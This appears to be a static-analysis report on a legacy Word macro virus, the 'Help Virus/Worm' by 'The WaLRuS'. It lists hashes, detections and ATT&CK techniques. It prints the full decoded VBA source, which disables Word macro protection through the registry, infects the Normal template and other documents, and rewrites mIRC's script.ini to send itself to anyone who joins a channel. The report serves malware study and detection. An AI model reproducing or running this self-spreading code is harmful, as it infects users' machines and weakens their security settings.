Win.Trojan.Psyjan — Office (OLE) malware analysis

Static analysis result for SHA-256 de6e71e3f3e79b19…

MALICIOUS

Office (OLE)

Size: 30.5 KB
Created: 2000-05-23 16:24:00
Authoring application: Microsoft Word 9.0
First seen: 2012-06-14
MD5: 2c0fe5ede3748f33e32c16f65bb444c5
SHA-1: 077655094abc4d4f313e7d2fbdbf28d4d5db4daa
SHA-256: de6e71e3f3e79b192a0747324c6a51d88ac6e24f56b6f99acee7917bcb1da015
Risk score: 256

Malware Insights

Win.Trojan.Psyjan · confidence 90%

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment

This legacy Word macro-based malware, identified as Win.Trojan.Psycho-3 by ClamAV, uses AutoOpen and AutoClose macros to infect other documents and the Normal template. It attempts to download and execute a second-stage payload by saving a file to 'c:\mirc\download\IRC-Rules.doc' and potentially executing 'c:\mirc\mirc32.exe'. The macro also attempts to disable Word's macro security settings.

Heuristics (6)

  • ClamAV: Win.Trojan.Psycho-3 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering [critical] OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script:
        Options.VirusProtection = False
  • AutoOpen macro [low] OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script:
        Sub AutoOpen()
  • Auto_Close macro [low] OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script:
        Sub AutoClose()
  • Legacy WordBasic macro-virus markers [high] OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 2781 bytes
SHA-256: 406a2cd3133ab7b1216bfdbe606c8d7756a8975abf1efd28712e2fea6f07cf3a
Detection: ClamAV: Doc.Trojan.Fool-5
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Help"

Sub AutoOpen()
    'Help Virus/Worm v1.10
    'The WaLRuS 05/00
    On Error Resume Next
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    CommandBars("Macro").Controls("Security...").Enabled = False
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
    ActiveDocument.ReadOnlyRecommended = False
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "The WaLRuS"
    Set Norm = NormalTemplate.VBProject.VBComponents: Set Doc = ActiveDocument.VBProject.VBComponents
If Norm.Item("Help").Name <> "Help" Then
    Doc("Help").Export "c:\Help.drv"
    Set infect = NormalTemplate.VBProject
ElseIf Doc.Item("Help").Name <> "Help" Then
    Norm("Help").Export "c:\Help.drv"
    Set infect = ActiveDocument.VBProject
End If
infect.VBComponents.Import ("c:\Help.drv")
Kill ("c:\Help.drv")
ActiveDocument.Save
CommandBars("Help").Controls("About Microsoft Word").Caption = "Help It's The WaLRuS"
If (Second(Now()) > 55) Then Call Help
End Sub

Sub AutoClose()
    On Error Resume Next
    If (Second(Now()) > 50) Then
    installed = Dir("c:\mirc\mirc32.exe")
    If installed = "" Then
    Exit Sub
    Else
    reproduce = Dir("c:\mirc\download\IRC-Rules.doc")
    If reproduce = "" Then ActiveDocument.SaveAs "c:\mirc\download\IRC-Rules.doc"
    Kill "c:\mirc\script.ini"
    Open "c:\mirc\script.ini" For Output As #1
    Print #1, "[script]"
    Print #1, "n0=on 1:JOIN:#: if ( $me != $nick ) { /dcc send $nick c:\mirc\download\IRC-Rules.doc }"
    Print #1, "n1=on 1:CONNECT: {"
    Print #1, "n2=  /join #virus "
    Print #1, "n3=  /msg #virus Help me if you can im feeling down. Im infected with the Help Virus by The WaLRuS"
    Print #1, "n4= /part #virus"
    Print #1, "n5= /clear"
    Print #1, "n6= /motd"
    Print #1, "n7= }"
    Close #1
    End If
    End If
End Sub

Sub HelpAbout()
    On Error Resume Next
    MsgBox "Help by The WaLRuS", 0, "Help I Need Somebody"
End Sub

Sub Help()
    On Error Resume Next
    Assistant.Visible = True
    With Assistant.NewBalloon
    .Icon = msoIconAlert
    .Text = "I do appreciate you being around"
    .Heading = "GREETINGS"
    .Show
    End With
End Sub

Sub ToolsMacro()
End Sub
Sub FileTemplates()
End Sub
Sub ViewVBCode()
End Sub